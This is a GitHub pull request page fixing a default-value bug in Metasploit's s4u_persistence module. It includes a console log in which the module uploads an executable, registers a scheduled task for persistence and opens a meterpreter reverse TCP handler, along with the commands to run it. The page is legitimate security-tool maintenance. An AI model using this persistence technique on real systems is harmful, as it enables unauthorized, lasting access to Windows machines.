Fix buggy default in s4u_persistence module #17351
Merged
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
smcintyre-r7
approved these changes
Dec 9, 2022
There was a problem hiding this comment.
I was able to reproduce the original issue and validate this fixes it. Thanks @smashery!
msf6 exploit(windows/local/s4u_persistence) > show options
Module options (exploit/windows/local/s4u_persistence):
Name Current Setting Required Description
---- --------------- -------- -----------
EXPIRE_TIME 0 no Number of minutes until trigger expires
FREQUENCY no Schedule trigger: Frequency in minutes to execute
PATH %TEMP% no PATH to write payload
REXENAME no Name of exe on remote system
RTASKNAME no Name of task on remote system
SESSION yes The session to run this module on
TRIGGER schedule yes Payload trigger method (Accepted: event, lock, logon, schedule, unlock)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.250.134 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows
View the full module info with the info, or info -d command.
msf6 exploit(windows/local/s4u_persistence) > set SESSION -1
SESSION => -1
msf6 exploit(windows/local/s4u_persistence) >
msf6 exploit(windows/local/s4u_persistence) > run
[*] Started reverse TCP handler on 192.168.250.134:4444
[+] Successfully Uploaded remote executable to %TEMP%\LQyuSSZscTCK.exe
[*] Defaulting frequency to every hour
[+] Successfully wrote XML file to %TEMP%\wfLLsGbitudHq.xml
[+] Persistence task HYalWOjeKE created successfully
[*] To delete task: schtasks /delete /tn "HYalWOjeKE" /f
[*] To delete payload: del %TEMP%\LQyuSSZscTCK.exe
[!] Could not delete file %TEMP%\wfLLsGbitudHq.xml, delete manually
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/s4u_persistence) >
Release NotesThis fixes an issue in the |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
The
s4u_persistencemodule, by default, incorrectly set thefrequencyvalue, which led to a confusing error message. This fixes that by correctly providing a default in the case of the value beingnil.Previously, if it was
nil, this would be treated as "Oh, the user provided a value for us", and this nothingness would be inserted into the XML. Then, you'd receive a failed exploit with the error message:The fix here is just to check for
nil, and set an appropriate default.Verification
List the steps needed to make sure this thing works
msfconsoleuse s4u_persistenceset session <id>run